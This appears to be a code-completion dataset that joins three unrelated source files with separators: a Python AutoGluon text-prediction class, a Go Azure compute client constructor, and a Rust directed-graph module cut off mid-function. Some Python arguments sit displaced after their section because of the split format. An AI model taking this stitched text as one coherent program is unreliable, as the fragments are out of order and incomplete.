search_strategy=tune_kwargs['searcher'],
search_options=tune_kwargs['search_options'],
nthreads_per_trial=num_cpus,
ngpus_per_trial=num_gpus,
checkpoint=os.path.join(self._output_directory, 'checkpoint.ag'),
num_trials=tune_kwargs['num_trials'],
time_out=time_limit,
resume=False,
visualizer=scheduler_options.get('visualizer'),
time_attr='report_idx',
reward_attr='reward_attr',
dist_ip_addrs=scheduler_options.get('dist_ip_addrs'))
# Create a temporary cache file. The internal train function will load the
# temporary cache.
os.makedirs(os.path.join(self._output_directory, 'data_cache'), exist_ok=True)
train_df_path = os.path.join(self._output_directory, 'data_cache',
'cache_train_dataframe.pd.pkl')
tuning_df_path = os.path.join(self._output_directory, 'data_cache',
'cache_tuning_dataframe.pd.pkl')
train_data.to_pickle(train_df_path)
tuning_data.to_pickle(tuning_df_path)
train_fn = search_space_reg(functools.partial(train_function,
train_df_path=train_df_path, | base_config=self.base_config,
problem_type=self.problem_type,
column_types=self._column_types,
feature_columns=self._feature_columns,
label_column=self._label_columns[0],
log_metrics=self._log_metrics,
eval_metric=self._eval_metric,
ngpus_per_trial=scheduler_options['resource']['num_gpus'],
console_log=console_log,
verbosity=verbosity))
no_job_finished_err_msg =\
'No training job has been completed! '\
'There are two possibilities: '\
'1) The time_limit is too small, '\
'or 2) There are some internal errors in AutoGluon. '\
'For the first case, you can increase the time_limit or set it to '\
'None, e.g., "predictor.fit(..., time_limit=None)". To '\
'further investigate the root cause, you can also set '\
'"verbosity=3" and try again, i.e., predictor.set_verbosity(3).'
if scheduler_options['num_trials'] == 1:
train_fn(train_fn.args['search_space'],
train_fn.args['_default_config'])
best_model_saved_dir_path = os.path.join(self._output_directory, 'task0')
cfg_path = os.path.join(self._output_directory, 'task0', 'cfg.yml')
# Check whether the job has finished
if not os.path.exists(cfg_path)\
or not os.path.exists(os.path.join(self._output_directory,
'task0', 'best_model.params')):
raise RuntimeError(no_job_finished_err_msg)
cfg = self.base_config.clone_merge(cfg_path)
local_results = pd.read_json(os.path.join(self._output_directory, 'task0',
'results_local.jsonl'), lines=True)
if plot_results:
plot_training_curves = os.path.join(self._output_directory,
'plot_training_curves.png')
import matplotlib.pyplot as plt
plt.ylabel(self._eval_metric)
plt.xlabel('report_idx')
plt.title("Performance vs Training-Time")
plt.plot(local_results['report_idx'].iloc[:-1],
local_results[local_results['eval_metric'][0]].iloc[:-1], label=f'task0')
plt.legend(loc='best')
plt.savefig(plot_training_curves)
plt.show()
self._results = local_results
else:
if tune_kwargs['search_strategy'] != 'local':
# Force forkserver if it's not using the local sequential HPO
force_forkserver()
scheduler_cls, scheduler_params = scheduler_factory(scheduler_options)
# Create scheduler, run HPO experiment
scheduler = scheduler_cls(train_fn, **scheduler_options)
scheduler.run()
scheduler.join_jobs()
if len(scheduler.config_history) == 0:
raise RuntimeError(no_job_finished_err_msg)
best_config = scheduler.get_best_config()
logger.info('Results={}'.format(scheduler.searcher._results))
logger.info('Best_config={}'.format(best_config))
best_task_id = scheduler.get_best_task_id()
best_model_saved_dir_path = os.path.join(self._output_directory,
'task{}'.format(best_task_id))
best_cfg_path = os.path.join(best_model_saved_dir_path, 'cfg.yml')
cfg = self.base_config.clone_merge(best_cfg_path)
if plot_results:
plot_training_curves = os.path.join(self._output_directory,
'plot_training_curves.png')
scheduler.get_training_curves(filename=plot_training_curves,
plot=plot_results,
use_legend=True)
self._results = dict()
self._results.update(best_reward=scheduler.get_best_reward(),
best_config=scheduler.get_best_config(),
total_time=time.time() - start_tick,
metadata=scheduler.metadata,
training_history=scheduler.training_history,
config_history=scheduler.config_history,
reward_attr=scheduler._reward_attr,
config=cfg)
# Consider moving this to a separate predictor
self._config = cfg
# Average parameters
# TODO(sxjscience) Clean up the temporary spaces used to store the intermediate checkpoints.
if cfg.model.use_avg_nbest:
nbest_path_l = []
for best_id in range(cfg.optimization.nbest):
nbest_path = os.path.join(best_model_saved_dir_path, f'nbest_model{best_id}.params')
if os.path.exists(nbest_path):
nbest_path_l.append(nbest_path)
avg_nbest_path = os.path.join(best_model_saved_dir_path, 'nbest_model_avg.params')
average_checkpoints(nbest_path_l, avg_nbest_path)
with open(os.path.join(best_model_saved_dir_path, 'preprocessor.pkl'), 'rb') as in_f:
self._preprocessor = pickle.load(in_f)
backbone_model_cls, backbone_cfg, tokenizer, backbone_params_path, _ \
= get_backbone(cfg.model.backbone.name)
if 'roberta' in cfg.model.backbone.name:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg, return_all_hiddens=True)
else:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg)
if self._problem_type == REGRESSION:
out_shape = 1
elif self._problem_type == MULTICLASS:
out_shape = len(self._preprocessor.label_generator.classes_)
elif self._problem_type == BINARY:
assert len(self._preprocessor.label_generator.classes_) == 2
out_shape = 2
else:
raise NotImplementedError
net = MultiModalWithPretrainedTextNN(
text_backbone=text_backbone,
num_text_features=1,
num_categorical_features=len(self._preprocessor.categorical_feature_names),
num_numerical_features=len(self._preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(self._preprocessor.numerical_feature_names) == 0 else len(
self._preprocessor.numerical_feature_names),
num_categories=self._preprocessor.categorical_num_categories,
get_embedding=False,
cfg=cfg.model.network,
out_shape=out_shape)
net.hybridize()
if cfg.model.use_avg_nbest:
net.load_parameters(avg_nbest_path, ctx=mx.cpu())
else:
net.load_parameters(os.path.join(best_model_saved_dir_path, 'best_model.params'),
ctx=mx.cpu())
self._net = net
mx.npx.waitall()
def evaluate(self, data, metrics=None, stochastic_chunk=None, num_repeat=None):
""" Report the predictive performance evaluated for a given dataset.
Parameters
----------
data : str or :class:`TabularDataset` or `pandas.DataFrame`
This Dataset must also contain the label-column with the same column-name as specified during `fit()`.
If str is passed, `data` will be loaded using the str value as the file path.
metrics : str or List[str] or None
Name of metric or a list of names of metrics to report.
If it is not given, we will return the score of the stored eval_metric.
stochastic_chunk
Whether to use stochastic chunk
num_repeat
The number of repeats
Returns
-------
ret : single number or a dict mapping metric name --> metric score
A single score if one metric is requested, otherwise a dict with one score per metric.
"""
if isinstance(metrics, str):
metrics = [metrics]
elif metrics is None:
metrics = [self._eval_metric]
assert self.net is not None
# We will always use all resources that are available for evaluation
ctx_l = get_mxnet_available_ctx()
self.net.collect_params().reset_ctx(ctx_l)
if not isinstance(data, pd.DataFrame):
if isinstance(data, (list, dict)):
data = pd.DataFrame(data)
elif isinstance(data, str):
data = load_pd.load(data)
else:
raise NotImplementedError(f'The format of data is not understood. '
f'We have type(data)="{type(data)}"')
data = data[self._feature_columns + self._label_columns]
if self._problem_type == MULTICLASS or self._problem_type == BINARY:
ground_truth = self.preprocessor.label_generator.transform(
data[self._label_columns[0]])
predictions = self.predict_proba(data,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
else:
ground_truth = pd.to_numeric(data[self._label_columns[0]]).to_numpy().astype(np.float32)
predictions = self.predict(data,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
metric_scores = [calculate_metric(get_metric(metric),
ground_truth, predictions, self._problem_type)
for metric in metrics]
# Once the inference is completed, we will cache all parameters back
# to CPU to avoid memory overflow.
self.net.collect_params().reset_ctx(mx.cpu())
if len(metric_scores) == 1:
return metric_scores[0]
else:
return {metric: score for metric, score in zip(metrics, metric_scores)}
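# A minimal usage sketch (hypothetical names): evaluating a fitted predictor on a
# held-out DataFrame `test_df` that contains the label column. 'acc' and 'f1' are
# assumed to be registered metric names.
#
#     single_score = predictor.evaluate(test_df)                   # uses the stored eval_metric
#     scores = predictor.evaluate(test_df, metrics=['acc', 'f1'])  # dict: metric name -> score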
def _internal_predict(self, data, get_original_labels=True, get_probabilities=False,
stochastic_chunk=None, num_repeat=None):
assert self.net is not None
assert self.config is not None
# We will always use all resources that are available for evaluation
ctx_l = get_mxnet_available_ctx()
self.net.collect_params().reset_ctx(ctx_l)
if not isinstance(data, pd.DataFrame):
if isinstance(data, (list, dict)):
data = pd.DataFrame(data)
elif isinstance(data, str):
data = load_pd.load(data)
else:
raise NotImplementedError(f'The format of data is not understood. '
f'We have type(data)="{type(data)}"')
dataset = self.preprocessor.transform(data[self._feature_columns])
inference_batch_size = self.config.optimization.per_device_batch_size \
* self.config.optimization.val_batch_size_mult
cls_id, sep_id = get_cls_sep_id(self.preprocessor.tokenizer)
if stochastic_chunk is None:
stochastic_chunk = self.config.model.test_stochastic_chunk
batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(self.preprocessor.text_feature_names),
num_categorical_inputs=len(self.preprocessor.categorical_feature_names),
num_numerical_inputs=len(self.preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id,
max_length=self.config.preprocessing.text.max_length,
mode='test',
stochastic_chunk=stochastic_chunk,
insert_sep=self.config.model.insert_sep)
dataloader = DataLoader(dataset,
batch_size=inference_batch_size,
shuffle=False,
batchify_fn=batchify_fn)
if num_repeat is None:
num_repeat = self.config.model.inference_num_repeat
test_predictions = _classification_regression_predict(
self._net,
dataloader=dataloader,
problem_type=self._problem_type,
label_scaler=self.preprocessor.label_scaler,
has_label=False,
num_repeat=num_repeat)
# Once the inference is completed, we will cache all parameters back
# to CPU to avoid memory overflow.
self.net.collect_params().reset_ctx(mx.cpu())
if self._problem_type == MULTICLASS or self._problem_type == BINARY:
if get_probabilities:
return test_predictions
else:
test_predictions = test_predictions.argmax(axis=-1)
if get_original_labels:
test_predictions = np.array(
self.preprocessor.label_generator.inverse_transform(test_predictions))
return test_predictions
@property
def class_labels(self):
"""The original name of the class labels.
For example, the tabular data may contain classes equal to
"entailment", "contradiction", "neutral". Internally, these will be converted to
0, 1, 2, ...
This function returns the original names of these raw labels.
Returns
-------
ret
List that contains the class names. It will be None if it's not a classification problem.
"""
if self.problem_type == MULTICLASS or self.problem_type == BINARY:
return self._preprocessor.label_generator.classes_
else:
warnings.warn('Accessing class names for a non-classification problem. Returning None.')
return None
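# A small sketch (hypothetical `predictor` and `test_df`): the i-th column of the
# probabilities returned by `predict_proba` corresponds to `class_labels[i]`.
#
#     proba = predictor.predict_proba(test_df)
#     proba_df = pd.DataFrame(proba, columns=predictor.class_labels)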
def predict_proba(self, test_data, stochastic_chunk=None, num_repeat=None):
"""Predict class probabilities instead of class labels (for classification tasks).
Parameters
----------
test_data : `pandas.DataFrame`, `autogluon.tabular.TabularDataset`, or str
The test data to get predictions for. Can be DataFrame/Dataset or a file that can
be loaded into DataFrame/Dataset.
stochastic_chunk : bool
Whether to enable stochastic chunk
num_repeat : int or None
The number of repeats for running the inference model.
Returns
-------
probabilities : array
The predicted class probabilities for each sample.
Shape of this array is (#Samples, num_class).
Here, the i-th number means the probability of belonging to the i-th class.
You can access the class names by calling `self.class_labels`.
"""
assert self.problem_type == MULTICLASS or self.problem_type == BINARY
return self._internal_predict(test_data,
get_original_labels=False,
get_probabilities=True,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
def predict(self, test_data, get_original_labels=True, stochastic_chunk=None, num_repeat=None):
"""Make predictions on new data.
Parameters
----------
test_data : `pandas.DataFrame`, `autogluon.tabular.TabularDataset`, or str
The test data to get predictions for. Can be DataFrame/Dataset or a file that can be loaded into DataFrame/Dataset.
get_original_labels : bool, default = True
Whether or not predictions should be formatted in terms of the original labels.
For example, the labels might be "entailment" or "not_entailment" and predictions could either be of this form (if `True`) or integer-indices corresponding to these classes (if `False`).
stochastic_chunk : bool or None, default = None
Whether to turn on stochastic chunk
num_repeat : int or None
The number of repeats
Returns
-------
predictions : array
The predictions for each sample. Shape of this array is (#Samples,).
"""
return self._internal_predict(test_data,
get_original_labels=get_original_labels,
get_probabilities=False,
stochastic_chunk=stochastic_chunk,
num_repeat=num_repeat)
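# A minimal sketch (hypothetical names) contrasting the two label formats for a
# classification predictor:
#
#     labels = predictor.predict(test_df)                                 # original class names
#     label_ids = predictor.predict(test_df, get_original_labels=False)   # integer indices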
def save(self, dir_path):
"""Save this model to disk.
Parameters
----------
dir_path : str
Directory where the model should be saved.
"""
os.makedirs(dir_path, exist_ok=True)
self.net.save_parameters(os.path.join(dir_path, 'net.params'))
with open(os.path.join(dir_path, 'cfg.yml'), 'w') as of:
of.write(self.config.dump())
# Save preprocessor
with open(os.path.join(dir_path, 'preprocessor.pkl'), 'wb') as of:
pickle.dump(self.preprocessor, of)
if not isinstance(self._eval_metric, str):
eval_metric = self._eval_metric.name
else:
eval_metric = self._eval_metric
log_metrics = []
for metric in self._log_metrics:
if not isinstance(metric, str):
log_metrics.append(metric.name)
else:
log_metrics.append(metric)
# Save additional assets about the parsed dataset information
with open(os.path.join(dir_path, 'assets.json'), 'w') as of:
json.dump(
{
'problem_type': self._problem_type,
'label_columns': self._label_columns,
'eval_metric': eval_metric,
'log_metrics': log_metrics,
'feature_columns': self._feature_columns,
'column_types': self._column_types,
'version': version.__version__,
}, of, ensure_ascii=True)
@classmethod
def load(cls, dir_path: str):
"""Load a model object previously produced by `fit()` from disk and return this object.
It is highly recommended that the predictor be loaded with the exact AutoGluon version
it was fit with.
Parameters
----------
dir_path
Path to directory where this model was previously saved.
Returns
-------
model
A `BertForTextPredictionBasic` object that can be used for making predictions on new data.
"""
cfg = base_cfg().clone_merge(os.path.join(dir_path, 'cfg.yml'))
with open(os.path.join(dir_path, 'preprocessor.pkl'), 'rb') as in_f:
preprocessor = pickle.load(in_f)
with open(os.path.join(dir_path, 'assets.json'), 'r') as f:
assets = json.load(f)
label_columns = assets['label_columns']
feature_columns = assets['feature_columns']
eval_metric = assets['eval_metric']
log_metrics = assets['log_metrics']
problem_type = assets['problem_type']
column_types = assets['column_types']
# TODO(sxjscience) Post 0.1. In general, we will need to support a compatibility check across versions
version = assets['version']
backbone_model_cls, backbone_cfg, tokenizer, backbone_params_path, _ \
= get_backbone(cfg.model.backbone.name)
if 'roberta' in cfg.model.backbone.name:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg, return_all_hiddens=True)
else:
text_backbone = backbone_model_cls.from_cfg(backbone_cfg)
if problem_type == REGRESSION:
out_shape = 1
elif problem_type == MULTICLASS:
out_shape = len(preprocessor.label_generator.classes_)
elif problem_type == BINARY:
assert len(preprocessor.label_generator.classes_) == 2
out_shape = 2
else:
raise NotImplementedError
net = MultiModalWithPretrainedTextNN(
text_backbone=text_backbone,
num_text_features=1,
num_categorical_features=len(preprocessor.categorical_feature_names),
num_numerical_features=len(preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(preprocessor.numerical_feature_names) == 0
else len(preprocessor.numerical_feature_names),
num_categories=preprocessor.categorical_num_categories,
get_embedding=False,
cfg=cfg.model.network,
out_shape=out_shape)
net.hybridize()
ctx_l = mx.cpu()
net.load_parameters(os.path.join(dir_path, 'net.params'), ctx=ctx_l)
model = cls(column_types=column_types,
label_columns=label_columns,
feature_columns=feature_columns,
problem_type=problem_type,
eval_metric=eval_metric,
log_metrics=log_metrics)
model._net = net
model._config = cfg
model._preprocessor = preprocessor
return model
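# A sketch of the intended save/load round trip (paths and variables are illustrative only):
#
#     predictor.save('saved_text_model')
#     restored = BertForTextPredictionBasic.load('saved_text_model')
#     predictions = restored.predict(test_df)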
def extract_embedding(self, data, stochastic_chunk=None, num_repeat=None):
"""Extract the embedding from the pretrained model.
Parameters
----------
data
Data that can be parsed to pandas dataframe
stochastic_chunk
Whether to use stochastic chunk
num_repeat
The number of repeats
Returns
-------
embeddings
The output embeddings will have shape
(#samples, embedding_dim)
"""
if not isinstance(data, pd.DataFrame):
if isinstance(data, (list, dict)):
data = pd.DataFrame(data)
elif isinstance(data, str):
data = load_pd.load(data)
else:
raise NotImplementedError(f'The format of data is not understood. '
f'We have type(data)="{type(data)}"')
dataset = self.preprocessor.transform(data[self.feature_columns])
inference_batch_size = self.config.optimization.per_device_batch_size \
* self.config.optimization.val_batch_size_mult
cls_id, sep_id = get_cls_sep_id(self.preprocessor.tokenizer)
if stochastic_chunk is None:
stochastic_chunk = self.config.model.test_stochastic_chunk
batchify_fn = MultiModalTextBatchify(
num_text_inputs=len(self.preprocessor.text_feature_names),
num_categorical_inputs=len(self.preprocessor.categorical_feature_names),
num_numerical_inputs=len(self.preprocessor.numerical_feature_names) > 0,
cls_token_id=cls_id, sep_token_id=sep_id,
max_length=self.config.preprocessing.text.max_length,
mode='test',
stochastic_chunk=stochastic_chunk,
insert_sep=self.config.model.insert_sep)
dataloader = DataLoader(dataset,
batch_size=inference_batch_size,
shuffle=False,
batchify_fn=batchify_fn)
if self._embed_net is None:
embed_net = MultiModalWithPretrainedTextNN(
text_backbone=self.net.text_backbone,
num_text_features=1,
num_categorical_features=len(self.preprocessor.categorical_feature_names),
num_numerical_features=len(self.preprocessor.numerical_feature_names) > 0,
numerical_input_units=None if len(self.preprocessor.numerical_feature_names) == 0
else len(self.preprocessor.numerical_feature_names),
num_categories=self.preprocessor.categorical_num_categories,
get_embedding=True,
cfg=self.config.model.network,
out_shape=self.net.out_shape,
params=self.net.collect_params(),
prefix='embed_net_')
embed_net.hybridize()
self._embed_net = embed_net
if num_repeat is None:
num_repeat = self.config.model.inference_num_repeat
ctx_l = get_mxnet_available_ctx()
self._embed_net.collect_params().reset_ctx(ctx_l)
embeddings = _classification_regression_predict(self._embed_net,
dataloader=dataloader,
problem_type=self._problem_type,
label_scaler=self.preprocessor.label_scaler,
has_label=False,
extract_embedding=True,
num_repeat=num_repeat)
self._embed_net.collect_params().reset_ctx(mx.cpu())
return embeddings | time_limit=time_limit,
time_start=start_tick,
tuning_df_path=tuning_df_path, |
client.go | package client
import (
"github.com/Azure/azure-sdk-for-go/services/compute/mgmt/2019-12-01/compute"
"github.com/Azure/azure-sdk-for-go/services/marketplaceordering/mgmt/2015-06-01/marketplaceordering"
"github.com/terraform-providers/terraform-provider-azurerm/azurerm/internal/common"
)
type Client struct {
AvailabilitySetsClient *compute.AvailabilitySetsClient
DedicatedHostsClient *compute.DedicatedHostsClient
DedicatedHostGroupsClient *compute.DedicatedHostGroupsClient
DisksClient *compute.DisksClient
DiskEncryptionSetsClient *compute.DiskEncryptionSetsClient
GalleriesClient *compute.GalleriesClient
GalleryImagesClient *compute.GalleryImagesClient
GalleryImageVersionsClient *compute.GalleryImageVersionsClient
ProximityPlacementGroupsClient *compute.ProximityPlacementGroupsClient
MarketplaceAgreementsClient *marketplaceordering.MarketplaceAgreementsClient
ImagesClient *compute.ImagesClient
SnapshotsClient *compute.SnapshotsClient
UsageClient *compute.UsageClient
VMExtensionImageClient *compute.VirtualMachineExtensionImagesClient
VMExtensionClient *compute.VirtualMachineExtensionsClient
VMScaleSetClient *compute.VirtualMachineScaleSetsClient
VMScaleSetExtensionsClient *compute.VirtualMachineScaleSetExtensionsClient
VMScaleSetRollingUpgradesClient *compute.VirtualMachineScaleSetRollingUpgradesClient
VMScaleSetVMsClient *compute.VirtualMachineScaleSetVMsClient
VMClient *compute.VirtualMachinesClient
VMImageClient *compute.VirtualMachineImagesClient
}
func NewClient(o *common.ClientOptions) *Client | {
availabilitySetsClient := compute.NewAvailabilitySetsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&availabilitySetsClient.Client, o.ResourceManagerAuthorizer)
dedicatedHostsClient := compute.NewDedicatedHostsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&dedicatedHostsClient.Client, o.ResourceManagerAuthorizer)
dedicatedHostGroupsClient := compute.NewDedicatedHostGroupsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&dedicatedHostGroupsClient.Client, o.ResourceManagerAuthorizer)
disksClient := compute.NewDisksClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&disksClient.Client, o.ResourceManagerAuthorizer)
diskEncryptionSetsClient := compute.NewDiskEncryptionSetsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&diskEncryptionSetsClient.Client, o.ResourceManagerAuthorizer)
galleriesClient := compute.NewGalleriesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&galleriesClient.Client, o.ResourceManagerAuthorizer)
galleryImagesClient := compute.NewGalleryImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&galleryImagesClient.Client, o.ResourceManagerAuthorizer)
galleryImageVersionsClient := compute.NewGalleryImageVersionsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&galleryImageVersionsClient.Client, o.ResourceManagerAuthorizer)
imagesClient := compute.NewImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&imagesClient.Client, o.ResourceManagerAuthorizer)
marketplaceAgreementsClient := marketplaceordering.NewMarketplaceAgreementsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&marketplaceAgreementsClient.Client, o.ResourceManagerAuthorizer)
proximityPlacementGroupsClient := compute.NewProximityPlacementGroupsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&proximityPlacementGroupsClient.Client, o.ResourceManagerAuthorizer)
snapshotsClient := compute.NewSnapshotsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&snapshotsClient.Client, o.ResourceManagerAuthorizer)
usageClient := compute.NewUsageClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&usageClient.Client, o.ResourceManagerAuthorizer)
vmExtensionImageClient := compute.NewVirtualMachineExtensionImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmExtensionImageClient.Client, o.ResourceManagerAuthorizer)
vmExtensionClient := compute.NewVirtualMachineExtensionsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmExtensionClient.Client, o.ResourceManagerAuthorizer)
vmImageClient := compute.NewVirtualMachineImagesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmImageClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetClient := compute.NewVirtualMachineScaleSetsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetExtensionsClient := compute.NewVirtualMachineScaleSetExtensionsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetExtensionsClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetRollingUpgradesClient := compute.NewVirtualMachineScaleSetRollingUpgradesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetRollingUpgradesClient.Client, o.ResourceManagerAuthorizer)
vmScaleSetVMsClient := compute.NewVirtualMachineScaleSetVMsClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmScaleSetVMsClient.Client, o.ResourceManagerAuthorizer)
vmClient := compute.NewVirtualMachinesClientWithBaseURI(o.ResourceManagerEndpoint, o.SubscriptionId)
o.ConfigureClient(&vmClient.Client, o.ResourceManagerAuthorizer)
return &Client{
AvailabilitySetsClient: &availabilitySetsClient,
DedicatedHostsClient: &dedicatedHostsClient,
DedicatedHostGroupsClient: &dedicatedHostGroupsClient,
DisksClient: &disksClient,
DiskEncryptionSetsClient: &diskEncryptionSetsClient,
GalleriesClient: &galleriesClient,
GalleryImagesClient: &galleryImagesClient,
GalleryImageVersionsClient: &galleryImageVersionsClient,
ImagesClient: &imagesClient,
MarketplaceAgreementsClient: &marketplaceAgreementsClient,
ProximityPlacementGroupsClient: &proximityPlacementGroupsClient,
SnapshotsClient: &snapshotsClient,
UsageClient: &usageClient,
VMExtensionImageClient: &vmExtensionImageClient,
VMExtensionClient: &vmExtensionClient,
VMScaleSetClient: &vmScaleSetClient,
VMScaleSetExtensionsClient: &vmScaleSetExtensionsClient,
VMScaleSetRollingUpgradesClient: &vmScaleSetRollingUpgradesClient,
VMScaleSetVMsClient: &vmScaleSetVMsClient,
VMClient: &vmClient,
VMImageClient: &vmImageClient,
}
} |
|
mod.rs | //! Implements a directed graph.
use rustc_hash::{FxHashMap, FxHashSet};
use std::cmp;
use std::collections::{BTreeMap, BTreeSet, VecDeque};
use std::fmt;
use crate::error::*;
pub trait Vertex: Clone + Sync {
/// The index of this vertex.
fn index(&self) -> usize;
/// A string to display in dot graphviz format.
fn dot_label(&self) -> String;
/// Fill color in dot graphviz format.
fn dot_fill_color(&self) -> String {
"#ffddcc".to_string()
}
/// Font color in dot graphviz format.
fn dot_font_color(&self) -> String {
"#000000".to_string()
}
}
pub trait Edge: Clone + Sync {
/// The index of the head vertex.
fn head(&self) -> usize;
/// The index of the tail vertex.
fn tail(&self) -> usize;
/// A string to display in dot graphviz format.
fn dot_label(&self) -> String;
/// Style in dot graphviz format.
fn dot_style(&self) -> String {
"solid".to_string()
}
/// Fill color in dot graphviz format.
fn dot_fill_color(&self) -> String {
"#000000".to_string()
}
/// Font color in dot graphviz format.
fn dot_font_color(&self) -> String {
"#000000".to_string()
}
/// Pen width in dot graphviz format.
fn dot_pen_width(&self) -> f64 {
1.0
}
}
/// An empty vertex for creating structures when data is not required
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize)]
pub struct NullVertex {
index: usize,
}
impl NullVertex {
pub fn new(index: usize) -> NullVertex {
NullVertex { index }
}
}
impl Vertex for NullVertex {
fn index(&self) -> usize {
self.index
}
fn dot_label(&self) -> String {
format!("{}", self.index)
}
}
/// An empty edge for creating structures when data is not required
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize)]
pub struct NullEdge {
head: usize,
tail: usize,
}
impl NullEdge {
pub fn new(head: usize, tail: usize) -> NullEdge {
NullEdge { head, tail }
}
}
impl Edge for NullEdge {
fn head(&self) -> usize {
self.head
}
fn tail(&self) -> usize {
self.tail
}
fn dot_label(&self) -> String {
format!("{} -> {}", self.head, self.tail)
}
}
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize)]
pub struct Loop {
header: usize,
nodes: BTreeSet<usize>,
}
impl Loop {
pub fn new(header: usize, nodes: BTreeSet<usize>) -> Self {
Self { header, nodes }
}
/// The set of nodes part of this loop
pub fn nodes(&self) -> &BTreeSet<usize> {
&self.nodes
}
/// The loop header node
pub fn header(&self) -> usize {
self.header
}
/// The set of loop tail nodes
pub fn tail(&self) -> BTreeSet<usize> {
let mut tail_nodes = self.nodes.clone();
tail_nodes.remove(&self.header);
tail_nodes
}
/// Returns `true` if this loop nests the other loop.
pub fn is_nesting(&self, other: &Self) -> bool {
self.header != other.header && self.nodes.contains(&other.header)
}
/// Returns `true` if this loop and another loop are disjoint.
pub fn is_disjoint(&self, other: &Self) -> bool {
self.header != other.header
&& !self.nodes.contains(&other.header)
&& !other.nodes.contains(&self.header)
}
}
impl Vertex for Loop {
fn index(&self) -> usize {
self.header
}
fn dot_label(&self) -> String {
format!("{}", self)
}
}
impl fmt::Display for Loop {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Loop 0x{:X}: {{", self.header)?;
let mut is_first = true;
for node in &self.nodes {
if !is_first {
write!(f, ", ")?;
}
write!(f, "0x{:X}", node)?;
is_first = false;
}
write!(f, "}}")
}
}
pub type LoopTree = Graph<Loop, NullEdge>;
/// A directed graph.
#[derive(Clone, Debug, Deserialize, Eq, Hash, Ord, PartialEq, PartialOrd, Serialize, Default)]
pub struct Graph<V: Vertex, E: Edge> {
vertices: BTreeMap<usize, V>,
edges: BTreeMap<(usize, usize), E>,
successors: BTreeMap<usize, BTreeSet<usize>>,
predecessors: BTreeMap<usize, BTreeSet<usize>>,
}
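// A minimal sketch of building and querying a graph with the null vertex/edge types:
//
//     let mut g: Graph<NullVertex, NullEdge> = Graph::new();
//     g.insert_vertex(NullVertex::new(0)).unwrap();
//     g.insert_vertex(NullVertex::new(1)).unwrap();
//     g.insert_edge(NullEdge::new(0, 1)).unwrap();
//     assert_eq!(g.successor_indices(0).unwrap(), vec![1]);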
impl<V, E> Graph<V, E>
where
V: Vertex,
E: Edge,
{
pub fn new() -> Graph<V, E> {
Graph {
vertices: BTreeMap::new(),
edges: BTreeMap::new(),
successors: BTreeMap::new(),
predecessors: BTreeMap::new(),
}
}
pub fn num_vertices(&self) -> usize {
self.vertices.len()
}
/// Returns true if the vertex with the given index exists in this graph
pub fn has_vertex(&self, index: usize) -> bool {
self.vertices.contains_key(&index)
}
/// Removes a vertex, and all edges associated with that vertex.
pub fn remove_vertex(&mut self, index: usize) -> Result<()> {
// TODO there's a lot of duplicated work in removing edges. Makes
// debugging easier, but could be made much more efficient.
if !self.has_vertex(index) {
bail!("vertex does not exist");
}
// remove this vertex
self.vertices.remove(&index);
// find all edges that deal with this vertex
let mut edges = FxHashSet::default();
if let Some(successors) = self.successors.get(&index) {
for successor in successors {
edges.insert((index, *successor));
}
};
if let Some(predecessors) = self.predecessors.get(&index) {
for predecessor in predecessors {
edges.insert((*predecessor, index));
}
};
// remove all of those edges
for edge in edges {
self.remove_edge(edge.0, edge.1)?;
}
self.predecessors.remove(&index);
self.successors.remove(&index);
Ok(())
}
/// Removes all unreachable vertices from this graph.
/// Unreachable means that there is no path from head to the vertex.
pub fn remove_unreachable_vertices(&mut self, head: usize) -> Result<()> {
self.unreachable_vertices(head)?
.iter()
.for_each(|vertex| self.remove_vertex(*vertex).unwrap());
Ok(())
}
/// Returns true if the edge with the given head and tail index exists in this graph
pub fn has_edge(&self, head: usize, tail: usize) -> bool {
